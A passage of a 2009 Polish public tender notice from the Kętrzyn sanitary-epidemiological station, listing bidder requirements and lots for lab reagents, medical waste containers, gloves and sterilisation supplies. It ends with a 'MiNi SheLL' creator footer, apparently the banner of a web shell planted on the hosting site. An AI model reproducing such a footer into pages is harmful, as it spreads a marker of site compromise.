d.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy.
2.	Wykonawcy, którzy złożyli wszystkie wymagane oświadczenia, dokumenty i formularze wymagane przez Zamawiającego.
3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga się, aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania, o których mowa w ust. 1 pkt a-d niniejszego rozdziału SIWZ. W przypadku konsorcjum żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy.
4.	Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie -spełnia - nie spełnia-. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawca obowiązany jest dołączyć do oferty następujące dokumenty i oświadczenia:
a)	aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej lub aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
c)	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d)	aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 Ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
e)	wypełniony formularz oferty stanowiący zał. nr 2 do SIWZ 
f)	wypełniony formularz cenowy do oferty stanowiący załącznik nr 2/1-2/15 do SIWZ dla wybranego zadania.
g)	oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie ze wzorem oświadczenia (stanowiącym załącznik nr 3  do niniejszej SIWZ); 
h)	Dokumenty określone jako -wymagania dodatkowe- w szczegółowym opisie przedmiotu zamówienia,

2.	W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione w ust. 1 pkt a,b,c niniejszego rozdziału SIWZ składa każdy z Wykonawców oddzielnie. Oświadczenie, o którym mowa w ust. 1 pkt g niniejszego rozdziału SIWZ składane jest wspólnie przez Wykonawców. 
3.	Dokumenty, o których mowa w ust. 1 niniejszego rozdziału należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę-osoby uprawnioną-e do reprezentacji Wykonawcy.
4.	Wszystkie dokumenty wymagane zgodnie z postanowieniami niniejszego rozdziału SIWZ powinny być złożone w języku polskim. Wszelkie dokumenty dołączone w innym języku niż język polski powinny być załączone wraz z tłumaczeniem przysięgłym na język polski, poświadczonym przez Wykonawcę (wyjątkiem są certyfikaty jakości, karty kontroli produktu).
5.	W przypadku konsorcjum do oferty musi być załączony dokument ustanawiający pełnomocnika konsorcjum do reprezentowania go w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.visacom.pl/psse_ketrzyn.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowa Stacja Sanitarno-Epidemiologiczna w Kętrzynie
Pl. marsz. J. Piłsudskiego 5
11-400 Kętrzyn
Tel. 089 754-21-40 fax 089 754 21 41
www.bip.visacom.pl/psse_ketrzyn.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2009 godzina 09:30, miejsce: Powiatowa Stacja Sanitarno-Epidemiologiczna w Kętrzynie
Pl. marsz. J. Piłsudskiego 5
11-400 Kętrzyn
pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1 - odczynniki chemiczne	zał. nr	1/	1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Roztwór buforowy pH 4.01 	opakowanie 500ml; lub równoważny produktowi HAMILTON; świadectwo jakości z oszacowana niepewnością 	op.	1
2	Roztwór buforowy pH 7,00 	opakowanie 500ml; lub równoważny produktowi HAMILTON; świadectwo jakości z oszacowaną niepewnością 	op.	1
3	Kwas solny 35-38% cz.d.a.	1op=1 litr ; gęstość 1,19 g/ml, bezbarwny, lub równoważny produkt produktowi POCH Gliwice.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie 2 - pojemniki na odpady medyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cpv	34928480-6	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Pojemnik jednorazowego użytku na odpady medyczne z przeznaczeniem do utylizacji    o pojemności od 2 litrów do 2,5 litra	Pojemnik:1. wykonany z tworzywa sztywnego, odpornego na działanie wilgoci, mechanicznie odporny na przekłucia i przecięcia materiału;                                 2. średnica otworu w pokrywie min.3,5 cm max 5 cm; 3.otwór pokrywy powinien posiadać wycięcie umożliwiające bezpieczne zdejmowanie igły;4. zamknięcie otworu pojemnika zespolone z pokrywą pojemnika; 5. otwór wrzutowy szczelnie zamykany po napełnieniu pojemnika; 6. pokrywa szczelnie zatrzaskiwana na pojemniku głównym;                         7. pojemnik ulegający biodegradacji;                        8. oznakowanie pojemnika zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 23 sierpnia 2007r.; 9.pojemnik i pokrywa w kolorze żółtym, a zakrywka w kolorze czerwonym	szt.	120
2	Pojemnik jednorazowego użytku na odpady medyczne z przeznaczeniem do utylizacji    o pojemności od 1 litra do 1,5 litra	Pojemnik:                                                 1. wykonany z tworzywa sztywnego, odpornego na działanie wilgoci, mechanicznie odporny na przekłucia i przecięcia materiału;                                  2.otwór pokrywy powinien posiadać wycięcie umożliwiające bezpieczne zdejmowanie igły;                      3. zamknięcie otworu pojemnika zespolone z pokrywą pojemnika; 4. otwór wrzutowy szczelnie zamykany po napełnieniu pojemnika; 5. pokrywa szczelnie zatrzaskiwana na pojemniku głównym;                         6. pojemnik ulegający biodegradacji;                        7. oznakowanie pojemnika zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 23 sierpnia 2007r.; 8.pojemnik i pokrywa w kolorze żółtym, a zakrywka w kolorze czerwonym	szt.	120
3	Pojemnik na odpady zbiorczy o pojemności 60 litrów	Pojemnik:                                                      1. pojemnik i pokrywa w kolorze żółtym;                                                       2. wykonany z tworzywa HDPE odpornego na uderzenia i chemikalia;                              3. z uchwytem do przenoszenia	szt.	4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie 3 - rękawiczki jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cpv	18424300-0	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Rękawiczki lateksowe pudrowane jednorazowego użytku	rozmiar średni; 1 opakowanie = 100 sztuk	op.	60
2.	Rękawiczki winylowe jednorazowego użytku	rozmiar średni; 1 opakowanie = 100 sztuk	op.	15.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.43.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie 4 - Artykuły do sterylizacji.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cpv	33191100-6	 		
lp.	nazwa produktu	szczegółowy opis przedmiotu zamówienia	j.m.	ilość
1	Paski TST	chemiczny wskaźnik kontroli procesu sterylizacji parą wodną w temperaturze 121 i 134 stopni Celsjusza; 1 opakowanie  = 100 sztuk; termin ważności minimum 1 rok od daty dostawy	op.	4
2.	Rurki Browne`a	chemiczny wskaźnik kontroli procesu sterylizacji na suche gorące powietrze w temperaturze 180 stopni Celsjusza;                   1 opakowanie  = 100 sztuk; termin ważności 1 rok od daty dostawy	op.	3
3	Sporale A	biologiczny wskaźnik kontroli procesu sterylizacji parą wodną; 1 opakowanie = 10 sztuk;  certyfikat dopuszczenia do obrotu; minimalny termin okresu przydatności 6 m-cy od dnia dostawy	op.	30
4	Worki do usuwania i utylizacji odpadów 	wykonane z PP; bez nadruku; do sterylizacji parowej w temperaturze 145 stopni Celsjusza; rozmiar: szerokość/wysokość 420 mm / 610 mm; 1 opakowanie = 500 sztuk	op.	2
5	Rękaw papierowo-foliowy 	do sterylizacji parowej, z dwoma wskaźnikami sterylizacji; bez zakładki; rozmiar 25 cm x 200 m	rulon	1
6	Rękaw papierowo-foliowy 	do sterylizacji parowej, z dwoma wskaźnikami sterylizacji; bez zakładki; rozmiar 30 cm x 200 m	rulon	1
7	Rękaw papierowo-foliowy	do sterylizacji parowej, z dwoma wskaźnikami sterylizacji; bez zakładki; rozmiar 20 cm x 200 m	rulon	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.11.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com